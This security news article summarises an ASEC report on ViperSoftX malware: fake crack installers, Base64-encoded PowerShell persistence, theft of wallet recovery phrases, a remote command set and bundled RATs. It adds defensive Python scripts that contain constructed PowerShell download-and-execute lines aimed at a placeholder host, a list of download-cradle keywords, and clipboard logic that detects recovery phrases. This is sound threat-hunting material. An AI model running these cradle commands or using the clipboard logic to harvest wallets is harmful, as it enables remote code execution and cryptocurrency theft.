
Flowchart (Image: ASEC)
The AhnLab Security Intelligence Center (ASEC) has issued a fresh warning about the resurgence of ViperSoftX, a stealthy and evolving malware strain designed to hijack systems, steal cryptocurrency, and execute remote commands—all via deeply obfuscated PowerShell scripts.
In recent weeks, ASEC confirmed that the threat actor behind ViperSoftX has been “continuously distributing malware to users in Korea”, though the campaign is global in scope. Originally discovered in 2020, ViperSoftX remains one of the most persistent threats targeting users through cleverly disguised software packages and file-sharing sites.
According to ASEC: “The method of disguising malware as illegal duplication programs such as cracks and keygens… is affecting a large number of victims worldwide.”
These fake installers are often bundled with TesseractStealer, Quasar RAT, and other payloads to extend the attacker’s foothold within the compromised machine.
Once inside the system, ViperSoftX sets up scheduled tasks that decode and execute Base64-encoded PowerShell commands. These commands do one of two things:
- Decrypt the next stage from malware hidden inside disguised local files
- Fetch commands dynamically from a command-and-control (C&C) server
ASEC explains: “The PowerShell command stored in the registry also acts as a downloader.”
This flexible infrastructure allows the malware to update itself and load additional modules such as PureCrypter and PureHVNC for enhanced remote control.
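The persistence layout described above (scheduled tasks and a registry value whose action is a Base64-encoded PowerShell stage) is something a responder can triage directly. The following is an added example, not code from ASEC or from the malware: it decodes the `-EncodedCommand` argument of exported scheduled-task XML and of Run-key command lines, then flags any stage that contains download-cradle or in-memory execution keywords. The task names, registry path, stage contents and `example.invalid` URLs are constructed samples; the marker list is an assumption meant to be extended.

```python
"""Decode Base64-encoded PowerShell stages from scheduled-task XML and Run-key
command lines and flag downloader behaviour. Added example; all samples below
are constructed and the marker list is an assumption, not ASEC's detection logic."""
import base64
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# powershell.exe accepts -e / -ec / -enc / -EncodedCommand, all case-insensitive,
# followed by Base64 of the UTF-16LE command text.
ENC_RE = re.compile(r"(?i)(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")

# Assumed indicators of a downloader / in-memory loader stage (lower-case).
DOWNLOADER_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
    "net.webclient", "invoke-expression", "iex ", "frombase64string",
    "start-bitstransfer",
)

# Constructed: shape of the XML that Export-ScheduledTask / schtasks /XML emits.
TASK_XML_TEMPLATE = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoP -W Hidden -Enc {b64}</Arguments>
    </Exec>
  </Actions>
</Task>"""


def encode_ps(command: str) -> str:
    """Produce the Base64(UTF-16LE) form that -EncodedCommand expects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(b64: str) -> str:
    """Reverse of encode_ps; raises ValueError/UnicodeDecodeError on junk."""
    return base64.b64decode(b64).decode("utf-16-le")


def task_command_lines(task_xml: str) -> list:
    """Return 'command arguments' strings for every <Exec> action in a task."""
    root = ET.fromstring(task_xml)
    lines = []
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = ex.findtext("t:Command", default="", namespaces=TASK_NS)
        args = ex.findtext("t:Arguments", default="", namespaces=TASK_NS)
        lines.append(f"{cmd} {args}".strip())
    return lines


def triage(source: str, cmdline: str) -> list:
    """Decode every encoded PowerShell blob in a command line and score it."""
    findings = []
    for b64 in ENC_RE.findall(cmdline):
        try:
            decoded = decode_ps(b64)
        except (ValueError, UnicodeDecodeError):
            continue  # not a well-formed encoded command; nothing to decode
        low = decoded.lower()
        hits = [m for m in DOWNLOADER_MARKERS if m in low]
        findings.append({"source": source, "decoded": decoded,
                         "markers": hits, "suspicious": bool(hits)})
    return findings


def hunt(task_xml_docs: dict, run_values: dict) -> list:
    """task_xml_docs: task path -> exported XML; run_values: registry value -> data."""
    findings = []
    for name, xml_doc in task_xml_docs.items():
        for cl in task_command_lines(xml_doc):
            findings.extend(triage(f"task:{name}", cl))
    for name, data in run_values.items():
        findings.extend(triage(f"registry:{name}", data))
    return findings


# Constructed samples: one downloader stage, one benign maintenance task,
# one Run-key value that pulls its command from a remote server.
STAGE_DOWNLOADER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
STAGE_BENIGN = "Get-Date | Out-File C:\\Temp\\last-run.txt"
STAGE_RUNKEY = "$s=(New-Object Net.WebClient).DownloadString('http://example.invalid/cmd'); IEX $s"

SAMPLE_TASKS = {
    "\\Microsoft\\Windows\\Maintenance\\Updater": TASK_XML_TEMPLATE.format(b64=encode_ps(STAGE_DOWNLOADER)),
    "\\Backup\\Nightly": TASK_XML_TEMPLATE.format(b64=encode_ps(STAGE_BENIGN)),
}
SAMPLE_RUN_VALUES = {
    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater":
        "powershell.exe -w hidden -EncodedCommand " + encode_ps(STAGE_RUNKEY),
}

if __name__ == "__main__":
    for f in hunt(SAMPLE_TASKS, SAMPLE_RUN_VALUES):
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"[{flag}] {f['source']}: {f['decoded']}  markers={f['markers']}")
```

On a live host the inputs would come from `Export-ScheduledTask` output and the `Run`/`RunOnce` values under HKCU and HKLM; a stage that merely decodes to another `-EncodedCommand` or to `FromBase64String` wrappers should be fed back through `triage` until it bottoms out.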
ViperSoftX is tailored to steal cryptocurrency data and monitor wallet recovery processes:
- It scans the clipboard for BIP39 recovery phrases
- Detects addresses for BTC, ETH, DOGE, XRP, and over a dozen other cryptocurrencies
- Sends stolen data via custom HTTP headers such as X-User-Agent and X-notify
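The clipboard logic above (recognise a BIP39 recovery phrase, otherwise look for a wallet address) is what the stealer runs on every copy, and the same classifier is what a clipboard-DLP rule or an alert-enrichment script would use. The following is an added example, not ASEC's or the malware's code. It validates a candidate mnemonic with the BIP39 checksum rather than by word count alone, and matches addresses structurally for the four coins the article names. Only the first twelve words of the English BIP39 list are embedded here; the full list of 2048 words is assumed to be loaded from a file in real use, and the address samples are constructed strings that satisfy the regexes, not real wallets.

```python
"""Classify clipboard text as a BIP39 mnemonic or a wallet address.
Added example, not the malware's or ASEC's code. BIP39_SAMPLE holds only the
first 12 words of the English list (indices 0..11); production use assumes the
full 2048-word list. Address regexes are structural only (no checksum)."""
import hashlib
import re

# First twelve entries of the English BIP39 wordlist, in list order.
BIP39_SAMPLE = {w: i for i, w in enumerate(
    "abandon ability able about above absent absorb abstract absurd abuse access accident".split()
)}
MNEMONIC_LENGTHS = (12, 15, 18, 21, 24)

# Structural patterns for the coins the article names (no checksum validation).
ADDRESS_PATTERNS = {
    "BTC": re.compile(r"(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{11,71})"),
    "ETH": re.compile(r"0x[0-9a-fA-F]{40}"),
    "DOGE": re.compile(r"D[5-9A-HJ-NP-U][1-9A-HJ-NP-Za-km-z]{32}"),
    "XRP": re.compile(r"r[1-9A-HJ-NP-Za-km-z]{24,34}"),
}


def bip39_checksum_ok(words, wordlist=BIP39_SAMPLE) -> bool:
    """BIP39: concatenate 11-bit word indices; the last len/3 bits must equal the
    leading bits of SHA-256 over the entropy that precedes them."""
    if len(words) not in MNEMONIC_LENGTHS:
        return False
    try:
        indices = [wordlist[w] for w in words]
    except KeyError:
        return False  # a word outside the list can never be a valid mnemonic
    bits = "".join(f"{i:011b}" for i in indices)
    cs_len = len(words) // 3
    entropy_bits, checksum_bits = bits[:-cs_len], bits[-cs_len:]
    entropy = int(entropy_bits, 2).to_bytes(len(entropy_bits) // 8, "big")
    digest_bits = "".join(f"{b:08b}" for b in hashlib.sha256(entropy).digest())
    return checksum_bits == digest_bits[:cs_len]


def classify_clipboard(text: str, wordlist=BIP39_SAMPLE):
    """Return ("mnemonic", word_count), ("address", coin) or ("none", None)."""
    tokens = text.strip().split()
    if len(tokens) in MNEMONIC_LENGTHS and bip39_checksum_ok([t.lower() for t in tokens], wordlist):
        return ("mnemonic", len(tokens))
    for tok in tokens:
        for coin, rx in ADDRESS_PATTERNS.items():
            if rx.fullmatch(tok):
                return ("address", coin)
    return ("none", None)


# Constructed samples. The first is the well-known all-"abandon" test mnemonic,
# which has a valid checksum; the second differs only in the last word.
SAMPLE_MNEMONIC_OK = " ".join(["abandon"] * 11 + ["about"])
SAMPLE_MNEMONIC_BAD = " ".join(["abandon"] * 12)
SAMPLE_ETH = "0x" + "ab12" * 10
SAMPLE_BTC = "bc1q" + "q" * 38
SAMPLE_DOGE = "D5" + "a" * 32
SAMPLE_XRP = "r" + "9" * 33

if __name__ == "__main__":
    for s in (SAMPLE_MNEMONIC_OK, SAMPLE_MNEMONIC_BAD, "pay " + SAMPLE_ETH,
              SAMPLE_BTC, SAMPLE_DOGE, SAMPLE_XRP, "hello world"):
        print(classify_clipboard(s), "<-", s[:40])
```

The checksum step matters in both directions: the stealer uses it to avoid exfiltrating random twelve-word sentences, and a defender writing a clipboard or DLP rule should use it to keep false positives down. Appending the full wordlist and swapping structural address matches for real Base58Check and EIP-55 validation is the obvious next step.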
In addition, the malware identifies when users launch wallet applications or browser extensions associated with crypto use.
ViperSoftX monitors:
- Active browser extensions (Chrome, Firefox, Edge, Brave, etc.)
- Installed programs
- Window titles and clipboard activity
More dangerously, it executes remote commands, both PowerShell and full executable payloads:
Command | Function
---|---
Cmd | Run PowerShell command
DwnlExe | Download and run executable
SelfRemove | End operation and clean up
RestartClient | Relaunch the malware
ViperSoftX campaigns also deploy:
- Quasar RAT: .NET-based malware for full system control
- PureCrypter: A commercial loader with injection and evasion features
- PureHVNC: Advanced remote desktop hijacking tool
- ClipBanker: Clipboard hijacker that replaces copied wallet addresses with the attacker’s
“Users must be cautious of installing software downloaded from suspicious websites or file-sharing sites instead of the official website,” ASEC emphasizes.